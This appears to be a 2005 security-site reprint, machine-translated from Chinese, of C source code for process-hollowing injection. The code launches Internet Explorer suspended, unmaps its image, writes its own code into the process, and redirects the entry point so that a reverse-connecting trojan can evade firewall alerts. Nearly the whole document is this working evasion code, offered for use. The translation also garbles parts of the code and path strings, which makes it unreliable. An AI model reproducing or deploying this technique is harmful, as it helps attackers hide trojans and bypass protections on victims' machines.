To bypass the firewall of the reverse connection Alarm-vulnerability warning-the black bar safety net

2005-11-27T00:00:00
ID MYHACK58:6220054888
Type myhack58
Reporter 佚名
Modified 2005-11-27T00:00:00

Description

/*

Author: Polymorphours

Date: 2005/1/10

Another will be your own code injected into the puppet of the process of the method, with the rebound Trojan can bypass the firewall Reverse connection Alarm.

*/

include

include

// // ntdll. lib ( from DDK 2 0 0 0 ) //

pragma comment(lib,"ntdll. lib")

typedef long NTSTATUS;

NTSYSAPI NTSTATUS NTAPI ZwUnmapViewOfSection( HANDLE ProcessHandle, PVOID BaseAddress );

typedef struct _ChildProcessInfo {

DWORD dwBaseAddress; DWORD dwReserve; } CHILDPROCESS, *PCHILDPROCESS;

BOOL FindIePath( char IePath, int dwBuffSize );

BOOL InjectProcess(void);

DWORD GetSelfImageSize( HMODULE hModule );

BOOL CreateInjectProcess( PPROCESS_INFORMATION pi, PCONTEXT pThreadCxt, CHILDPROCESS *pChildProcess );

char szIePath[MAX_PATH];

int main(void) { if (InjectProcess() ) {

printf("This is my a test code,made by (Polymorphours)shadow3.\ r\n"); } else {

MessageBox(NULL,"process insertion completed","Text",MB_OK); }

return 0; }

BOOL FindIePath( char IePath, int dwBuffSize ) { char szSystemDir[MAX_PATH];

GetSystemDirectory(szSystemDir,MAX_PATH);

szSystemDir[2] = '\0' lstrcat(szSystemDir,"\\Program Files\the\Internet Explorer\\iexplore.exe");

lstrcpy(IePath, szSystemDir); return TRUE; }

BOOL InjectProcess(void) { char szModulePath[MAX_PATH]; DWORD dwImageSize = 0;

STARTUPINFO si = {0}; PROCESS_INFORMATION pi; CONTEXT ThreadCxt; DWORD *PPEB; DWORD dwWrite = 0; CHILDPROCESS stChildProcess; LPVOID lpVirtual = NULL; PIMAGE_DOS_HEADER pDosheader = NULL; PIMAGE_NT_HEADERS pVirPeHead = NULL;

HMODULE hModule = NULL;

ZeroMemory( szModulePath, MAX_PATH ); ZeroMemory( szIePath, MAX_PATH );

GetModuleFileName( NULL, szModulePath, MAX_PATH ); FindIePath( szIePath, NULL );

if ( lstrcmpiA( szIePath, szModulePath ) == 0 ) {

return FALSE; }

hModule = GetModuleHandle( NULL ); if ( hModule == NULL ) {

return FALSE; }

pDosheader = (PIMAGE_DOS_HEADER)hModule; pVirPeHead = (PIMAGE_NT_HEADERS)((DWORD)hModule + pDosheader->e_lfanew);

dwImageSize = GetSelfImageSize(hModule);

// // To suspend mode to start a puppet process,where in order to pass through the firewall, using the IE process //

if ( CreateInjectProcess( &pi, &ThreadCxt , &stChildProcess ) ) {

printf("CHILD PID: [%d]\r\n",pi. dwProcessId);

// // Uninstall needs to be injected in the process of code //

if ( ZwUnmapViewOfSection( pi. hProcess, (LPVOID)stChildProcess. dwBaseAddress ) == 0 ) {

// // Re-allocate memory //

lpVirtual = VirtualAllocEx( pi. hProcess, (LPVOID)hModule, dwImageSize, MEM_RESERVE │ MEM_COMMIT, PAGE_EXECUTE_READWRITE );

if ( lpVirtual ) {

printf("Unmapped and Allocated Mem Success.\ r\n"); }

} else {

printf("ZwUnmapViewOfSection() failed.\ r\n"); return TRUE; }

if ( lpVirtual ) {

PPEB = (DWORD *)ThreadCxt. Ebx;

// // Override load address //

WriteProcessMemory( pi. hProcess, &PPEB[2], &lpVirtual, sizeof(DWORD), &dwWrite );

// // Write your own process code to the target process //

if ( WriteProcessMemory( pi. hProcess, lpVirtual, hModule, dwImageSize, &dwWrite) ) {

printf("image inject into the process a success.\ r\n");

ThreadCxt. ContextFlags = CONTEXT_FULL; if ( (DWORD)lpVirtual == stChildProcess. dwBaseAddress ) {

ThreadCxt. Eax = (DWORD)pVirPeHead->OptionalHeader. ImageBase + pVirPeHead->OptionalHeader. AddressOfEntryPoint; } else {

ThreadCxt. Eax = (DWORD)lpVirtual + pVirPeHead->OptionalHeader. AddressOfEntryPoint; }

ifdef DEBUG

printf("EAX = [0x%08x]\r\n",ThreadCxt. Eax); printf("EBX = [0x%08x]\r\n",ThreadCxt. Ebx); printf("ECX = [0x%08x]\r\n",ThreadCxt. Ecx); printf("EDX = [0x%08x]\r\n",ThreadCxt. Edx); printf("EIP = [0x%08x]\r\n",ThreadCxt. Eip);

endif

SetThreadContext(pi. hThread, &ThreadCxt); ResumeThread(pi. hThread);

} else {

printf("WirteMemory Failed,code:%d\r\n",GetLastError()); TerminateProcess(pi. hProcess, 0);}

} else {

printf("VirtualMemory Failed,code:%d\r\n",GetLastError()); TerminateProcess(pi. hProcess, 0); } }

return TRUE; }

DWORD GetSelfImageSize( HMODULE hModule ) { DWORD dwImageSize;

_asm { mov ecx,0x30 mov eax, fs:[ecx] mov eax, [eax + 0x0c] mov esi, [eax + 0x0c] add esi,0x20 lodsd mov dwImageSize,eax

}

return dwImageSize; }

BOOL CreateInjectProcess( PPROCESS_INFORMATION pi, PCONTEXT pThreadCxt, CHILDPROCESS *pChildProcess )

{ STARTUPINFO si = {0};

DWORD *PPEB; DWORD read;

// Use the suspend mode to start ie

if( CreateProcess( NULL, szIePath, NULL, NULL, 0, CREATE_SUSPENDED, NULL, NULL, &si, pi ) ) {

pThreadCxt->ContextFlags = CONTEXT_FULL; GetThreadContext(pi->hThread, pThreadCxt);

PPEB = (DWORD *)pThreadCxt->Ebx;

// Get ie to load the base address ReadProcessMemory( pi->hProcess, &PPEB[2], (LPVOID)&(pChildProcess->dwBaseAddress), sizeof(DWORD), &read );

return TRUE ;

}

return FALSE; }

WSS(Whitecell Security Systems), a non-profit civiltechnicalorganization, is committed to a variety of system securitytechnologyresearch. Stick to the traditional hacker Spirit, the pursuit of thetechnicalof fine pure. WSS home page: http://www.whitecell.org/ WSS Forum: http://www.whitecell.org/forums/